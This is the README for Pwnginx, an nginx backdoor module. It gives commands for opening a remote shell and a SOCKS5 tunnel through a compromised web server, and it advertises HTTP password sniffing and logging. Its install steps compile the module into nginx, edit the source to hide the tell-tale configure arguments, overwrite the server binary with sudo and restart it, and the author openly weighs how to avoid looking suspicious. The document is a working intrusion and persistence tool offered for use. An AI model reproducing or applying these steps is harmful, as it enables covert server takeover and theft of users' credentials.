#[ Pwnginx ] - Pwn nginx
Copyleft by t57root @ openwill.me
<[email protected]> www.HackShell.net
Get shell access via the nginx running @ [ip]:[port]
./pwnginx shell [ip] [port] [password]
Get a socks5 tunnel listening at [socks5ip]:[socks5port]
./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port]
Remote shell access
Socks5 tunneling via existing http connection
Http password sniffing & logging
Compile the client:
$ cd client;make
Edit source to hidden configure arguments:
$ vim src/core/nginx.c
Modify the
configure arguments
line into:configure arguments: --prefix=/opt/nginx\n");
(original configure arguments shown in the result ofnginx -V
) -
Recompile nginx:
$ cd /path/to/nginx/source; ./configure --prefix=/opt/nginx --add-module=/path/to/pwnginx/module && make (There is no need to run
make install
)$ sudo cp -f objs/nginx /path/to/nginx/sbin/nginx
Restart nginx
$ sudo killall nginx && /path/to/nginx/sbin/nginx
Pack communication traffic into HTTP protocol
Full pty support
Shell with root privilege(? There must be another stand-alone 'nginx: master process' running under root to support this function. Maybe that's too suspicious. Being considered.)